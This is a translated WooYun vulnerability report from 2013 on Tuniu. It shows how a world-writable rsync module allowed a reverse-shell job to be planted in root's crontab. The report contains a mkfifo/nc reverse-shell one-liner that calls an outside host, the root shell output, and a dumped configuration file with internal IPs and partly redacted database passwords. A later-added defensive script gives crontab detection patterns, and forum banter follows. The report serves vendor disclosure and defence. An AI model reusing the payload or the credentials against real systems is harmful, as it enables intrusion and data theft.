
Vulnerability summary

Defect ID: wooyun-2013-034232

Title: Exploiting an ops security flaw to directly obtain privileges on Tuniu's key internal business systems (backdoor and lateral movement possible; definitely not Struts)

Vendor: Tuniu (途牛旅游网)

Author: 结界师

Submitted: 2013-08-13 12:45

Fixed: 2013-09-27 12:45

Published: 2013-09-27 12:45

Vulnerability type: Improper system/service ops configuration

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-08-13: Details sent to the vendor, awaiting vendor handling
2013-08-13: Vendor confirmed; details disclosed to the vendor only
2013-08-23: Details disclosed to core white hats and relevant domain experts
2013-09-02: Details disclosed to regular white hats
2013-09-12: Details disclosed to intern white hats
2013-09-27: Details disclosed to the public

Brief description:

A flaw in ops habits plus a little inspiration is enough to directly obtain system privileges on Tuniu's key (very critical) business systems, and those privileges can then be used for internal network penetration.

Detailed description:

{
"WyVul": [],
"protocol": "tcp",
"state": "open",
"portid": "873",
"Service": {
"method": "probed",
"srvName": "rsync",
"srvProduct": "",
"srvVersion": ""
}
}


rsync boss.tuniu.com::
place_photo_new
hotel_photo_new
route_img_new
pic_adv_new
provider
htdocs
olv
cron
mnt


rsync boss.tuniu.com::cron
drwx------ 4096 2013/08/06 21:29:10 .
-rw------- 0 2013/03/11 16:42:57 apache
-rw------- 214 2011/07/02 15:41:03 heming
-rw------- 37776 2013/08/06 21:29:10 root
-rw------- 37777 2013/08/06 16:45:22 root.bak_puppet


Excited yet? What does this mean?!

rsync boss.tuniu.com::cron/root /tmp/root
cat /tmp/root
# HEADER: This file was autogenerated at Wed Apr 17 17:48:00 +0800 2013 by puppet.
# HEADER: While it can still be managed manually, it is definitely not recommended.
# HEADER: Note particularly that the comments starting with 'Puppet Name' should
# HEADER: not be deleted, as doing so could cause duplicate cron jobs.
#backup bbs
#0 0 * * 0 /usr/bin/rsync -tvzrpog --progress 58.68.255.36::mnt_bbs /opt/tuniu/mnt2/bbs --bwlimit=1024
0-10,30-40 * * * * (/bin/date >> /tmp/133.log; /bin/ps aux| /bin/sort -k 3 -nr| /usr/bin/head >> /tmp/133.log)
*/10 * * * * (cd /opt/tuniu/www/crm/scripts/yinfulei/; /opt/tuniu/php/bin/php product_change_price_to_order_compare.php)
#0 1 * * * export dd=`/bin/date --date='today' +'\%d/\%b/\%Y'`; /bin/grep $dd /opt/tuniu/apache2/logs/crm.tuniu.com.log | /bin/grep "GET /main.php?do=route" | /bin/awk '{print $2" "$5" "$7" "$8}'> /opt/tuniu/mnt/liuxiaotao.log
20 23 * * * export dd=`/bin/date --date='today' +'\%d/\%b/\%Y'`; /bin/grep "$dd" /opt/tuniu/apache2/logs/crm.tuniu.com.log | /bin/grep "main.php?do=route" | /bin/awk '{print $2" "$5" "$7" "$8}'> /opt/tuniu/mnt/liuxiaotao.log
30 23 * * * export dd=`/bin/date --date='today' +'\%d/\%b/\%Y'`; /bin/grep "$dd" /opt/tuniu/apache2/logs/crm.tuniu.com.log | /bin/grep "main.php?do=stock_warning"| /bin/awk '{print $2" "$5" "$7" "$8}'>> /opt/tuniu/mnt/liuxiaotao.log
40 23 * * * export dd=`/bin/date --date='today' +'\%d/\%b/\%Y'`; /bin/grep "$dd" /opt/tuniu/apache2/logs/crm.tuniu.com.log | /bin/grep "main.php?do=p_ticket_clendar_show"| /bin/awk '{print $2" "$5" "$7" "$8}'>> /opt/tuniu/mnt/liuxiaotao.log


So this ops engineer has exposed the cron directory over rsync? And what if the module allows writes as well?
Let's append the following to it:

#OMS-2819
*/1 * * * * ( rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc *.wooyun.org 9999 >/tmp/f )


Then:

rsync /tmp/root root@boss.tuniu.com::cron/root


No errors at all. I'm a genius. Now just wait for the shell.

nc -l -vv 9999
Ncat: Version 6.25 ( http://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 218.94.82.118.
Ncat: Connection from 218.94.82.118:28542.
sh: no job control in this shell
sh-3.2# sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# uname -a
Linux dl486Q13X.tuniu.org 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 i686 i386 GNU/Linux
sh-3.2#


The rest is......
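A defender-side check for the crontab tampering shown above, added here as an example that is not part of the original report: it diffs the live root crontab against the Puppet-managed copy (the listing shows root.bak_puppet next to root) and flags jobs that look like reverse shells or download-and-run loaders. The two crontab samples are constructed from the report's own lines, and attacker.example is a placeholder host.

```python
import re

# Constructed sample: the Puppet-managed copy of root's crontab (the report
# shows such a copy as root.bak_puppet next to the live file root).
BASELINE = """# HEADER: This file was autogenerated by puppet.
0-10,30-40 * * * * (/bin/date >> /tmp/133.log; /bin/ps aux| /bin/sort -k 3 -nr| /usr/bin/head >> /tmp/133.log)
*/10 * * * * (cd /opt/tuniu/www/crm/scripts/yinfulei/; /opt/tuniu/php/bin/php product_change_price_to_order_compare.php)
"""

# Constructed sample: the live crontab after a job was appended through the
# writable rsync module. The ticket-style comment mimics a legitimate change;
# attacker.example is a placeholder host.
CURRENT = BASELINE + """#OMS-2819
*/1 * * * * ( rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker.example 9999 >/tmp/f )
"""

# Patterns typical of reverse shells or download-and-run jobs.
SUSPICIOUS = [
    re.compile(r"\bmkfifo\b"),
    re.compile(r"/bin/(ba)?sh\s+-i\b"),
    re.compile(r"\b(nc|ncat|netcat)\b"),
    re.compile(r"/dev/tcp/"),
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
]


def jobs(crontab: str) -> set:
    """Active job lines of a crontab; comments and blank lines are ignored."""
    return {line.strip() for line in crontab.splitlines()
            if line.strip() and not line.lstrip().startswith("#")}


def audit(baseline: str, current: str) -> dict:
    """Diff the live crontab against the managed copy and flag risky jobs."""
    base, cur = jobs(baseline), jobs(current)
    return {
        "added": sorted(cur - base),      # jobs Puppet does not know about
        "removed": sorted(base - cur),    # managed jobs that disappeared
        "flagged": sorted(j for j in cur if any(p.search(j) for p in SUSPICIOUS)),
    }


if __name__ == "__main__":
    for kind, lines in audit(BASELINE, CURRENT).items():
        for line in lines:
            print(f"{kind}: {line}")
```

Run it periodically (or from a file-integrity monitor) against /var/spool/cron/root and the Puppet copy; any "added" or "flagged" entry on a host that is only supposed to be managed by Puppet is worth an immediate look.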

Proof of vulnerability:

[image: abcd.jpg]


<?php
//Local database configuration
define('DB_HOST', '172.22.0.135');
define('DB_PORT', '3306');
define('DB_USERNAME', 'boss');
define('DB_PASSWORD', 'BoSS[redacted]Niu');
define('DB_SCHEMA', 'crm');
//Local read-only database configuration
define('DB_HOST_RO', '172.22.0.171');
#define('DB_HOST_RO', '192.168.1.135');
define('DB_PORT_RO', '3306');
define('DB_USERNAME_RO', 'boss');
define('DB_PASSWORD_RO', 'uinut#133[redacted]oss#March');
#define('DB_PASSWORD_RO', 'uinut#133[redacted]oss#March');
define('DB_SCHEMA_RO', 'crm');
//Local write-only database configuration
define('DB_HOST_WO', '172.22.0.135');
define('DB_PORT_WO', '3306');
define('DB_USERNAME_WO', 'boss');
define('DB_PASSWORD_WO', 'BoS[redacted]Niu');
define('DB_SCHEMA_WO', 'crm');
//Public-network database
#define('DB_HOST_NET', '114.[redacted].94');
#define('DB_HOST_NET', '58.[redacted].42');
define('DB_HOST_NET', '58.[redacted].43');
define('DB_PORT_NET', '3306');
define('DB_USERNAME_NET', 'tuniu');
define('DB_PASSWORD_NET', 'Bos[redacted]#niU');
define('DB_SCHEMA_NET', 'tuniu');
//Local ICE configuration
define('ICE_NEED_USE', 1);
define('ICE_HOST_ADDRESS', '210.[redacted]218');
define('ICE_HOST_PORT', '10000');
// ---------- memcached info --------------- //
define('MEMCACHED_HOST', '172.22.0.133');
define('MEMCACHED_PORT', 11211);
define('MEMCACHED_FLAG', false);
//define('MEMCACHED_HOST_NET', '210.[redacted].218');
define('MEMCACHED_HOST_NET', '60.[redacted].121');
define('MEMCACHED_PORT_NET', 11211);
// -------------- Knowledge base search address -------------
define('KNOWLEDGE_SEARCH_URL',"http://172.22.0.133:8080");
//--------------- Lakala payment address ------------------
define('LAKALA_HOST',"http://218.[redacted].238:8080");
//--------------- eJia insurance ------------------------
//define('EJIA_HOST',"http://www.ejsino.cn:8080");
//define('EJIA_HOST',"http://203.166.160.178:8080");
define('EJIA_HOST',"http://www.ejsino.com:8080");
//---------------ABCPDF-Server------------------------
define('ABCPDF_HOST',"http://192.168.1.129:80");
define('ABCPDF_HOST_NET',"http://222.[redacted].142:8129");
define('ABCPDF_HOST_LOCAL',"http://192.168.1.129:80");
define('ABCPDF_DIR',"abcpdf/PDF/");
define('ABCPDF_PATH',"pdf");
//----------------CRM-BOSS-SERVER-----------------
define('CRM_HOST_IP',"172.22.0.133");
define('CRM_HOST_PORT',80);
define('BOSS_HOST_IP',"218.[redacted].238");
define('BOSS_HOST_PORT',80);
//---------------FAX - SERVER ---------------------
define('FAX_REC_NO',"025-86853999");
define('FAX_BJ_NO',"025-86853999");
define('FAX_HZ_NO',"025-86853999");
//define('FAX_HZ_NO',"025-86853999");
define('FAX_SZ_NO',"025-86853999");
define('FAX_SH_NO',"025-86853999");
define('FAX_TJ_NO',"025-86853999");
define('FAX_SHZ_NO',"025-86853999");
define('FAX_CD_NO',"025-86853999");
define('FAX_WH_NO',"025-86853999");
//---------------Customer Service Hotline ------------
define('PHONE_CUSTOMER_SERVICE_HOTLINE',"4007-999-999");
//----------------RTX - SERVER ---------------------
define('RTX_HOST',"192.168.1.145");
define('RTX_PORT',"8012");
define('RTX_URI',"sendnotify.cgi");
define('RTX_OFFLINE',"getofflineusers.php");
//----------------SOLR - SERVER --------------------
define('SOLR_HOST',"172.22.0.133");
define('SOLR_PORT',"8080");
define('SOLR_URI',"/solr/person");
//----------BOSS WEB info --------------- //
define("BOSS_HOST","boss.tuniu.com");
define("BOSS_PORT","80");
define("BOSS_USERNAME","");
define("BOSS_PASSWORD","");
//----------FMIS RPC configuration --------------- //
define("FMIS2_HOST","fmis2.tuniu.com");
define("FMIS2_PORT","80");
define("FMIS2_USERNAME","");
define("FMIS2_PASSWORD","");
//OA database add by miaochen 2010.07.06
define('DB_HOST_OA', '172.22.1.195');
define('DB_PORT_OA', '3306');
define('DB_USERNAME_OA', 'TuniuOA');
define('DB_PASSWORD_OA', 'uinut[redacted]TuniuOA');
define('DB_SCHEMA_OA', 'TuniuOA');
define('OA_URL','oa/');//add by miaochen
define('HD_URL','http://helpdesk.tuniu.com/');
//TUNIU_INTERFACE_HOST
define('TUNIU_INTERFACE_HOST','www.tuniu.com');
define('TUNIU_INTERFACE_PORT','80');
//Absolute path of the finance system, added by jibing 2009-08-24
define('FMIS_PATH','/opt/tuniu/www/FMIS/');
//Absolute path of the CRM system, added by jibing 2009-08-24
define('CRM_PATH','/opt/tuniu/www/crm/');
define('FMIS_SWITCH',2);
//Kuaijie Air interface configuration
define('KUAIJIEAIR_HOST',"www.kuaijieair.net");
define('KUAIJIEAIR_PORT',"80");
define('KUAIJIEAIR_URI',"jipiao/port/s.php");
define('KUAIJIEAIR_UID',"798");
//Commission and statistics data
define('DB_HOST_FMIS_RO', '172.22.1.189');
define('DB_PORT_FMIS_RO', '3306');
define('DB_USERNAME_FMIS_RO', '[redacted]');
define('DB_PASSWORD_FMIS_RO', 'fb123');
define('DB_SCHEMA_FMIS_RO', 'fmis');
//Call center database
define('DB_INFOBIRD_HOST', '172.[redacted].50');
define('DB_INFOBIRD_PORT', '1433');
define('DB_INFOBIRD_USERNAME', 'sa');
define('DB_INFOBIRD_PASSWORD', '[redacted]');
define('DB_INFOBIRD_SCHEMA', 'infobird');
//Hotel order URL
define('HOTEL_URL','http://crm.tuniu.com/hotelorder');
//added by huxiaomin@20110805
define('CRM_HOST','crm.tuniu.com');
define('FAX_URL','http://fax.tuniu.org/');//add by huxiaomin 2011 08 11, URL for the fax platform
//added by huanleG@20111108
define('CRM_PORT','80');
define('OA_HOST','oa.tuniu.com');

Fix recommendation:

Copyright notice: when reposting, please credit 结界师@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2013-08-13 12:48

Vendor reply:

Issue confirmed, thanks @结界师

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2013-08-13 12:52 | erevus ( Regular white hat | Rank:177 Vulnerabilities:31 | Hacked by @ringzero, I was wrong)

    结界师 is being mischievous again... front row, everything for sale

  2. 2013-08-13 12:56 | M0nster ( Intern white hat | Rank:53 Vulnerabilities:17 | Let our country's artists get rich first)

    Damn, confirmed within seconds

  3. 2013-08-13 12:58 | niliu Certified white hat ( Core white hat | Rank:1542 Vulnerabilities:206 | Against the current)

    Floor 4 sells body and kidneys

  4. 2013-08-13 13:32 | se55i0n ( Regular white hat | Rank:1567 Vulnerabilities:173 )

    Bowing in awe

  5. 2013-08-13 13:35 | 小胖子 Certified white hat ( Core white hat | Rank:1727 Vulnerabilities:140 | If only the sea could wash away my short ugliness...)

    @se55i0n you've been cursed by the post above; come out and sell with me tonight, body and kidneys...

  6. 2013-08-13 13:53 | 淡漠天空 Certified white hat ( Intern white hat | Rank:1113 Vulnerabilities:142 | M: Selling GOV STATE NSA CIA NASA DHS Symant...)

    @小胖子 selling yourself or not?

  7. 2013-08-13 13:59 | 小胖子 Certified white hat ( Core white hat | Rank:1727 Vulnerabilities:140 | If only the sea could wash away my short ugliness...)

    @淡漠天空 In a gigolo's eyes there is no man in this world who won't sell; the most they can understand about "not selling" is that the price wasn't right. Selling is fine, as long as the WB pays enough!

  8. 2013-08-13 14:01 | M0nster ( Intern white hat | Rank:53 Vulnerabilities:17 | Let our country's artists get rich first)

    @小胖子 Hahahahahaha!!! Selling is fine, as long as the WB pays enough!

  9. 2013-08-13 17:58 | se55i0n ( Regular white hat | Rank:1567 Vulnerabilities:173 )

    @小胖子 Damn, only just saw this :(

  10. 2013-09-02 13:14 | 小胖子 Certified white hat ( Core white hat | Rank:1727 Vulnerabilities:140 | If only the sea could wash away my short ugliness...)

    This is awesome, truly awesome!!!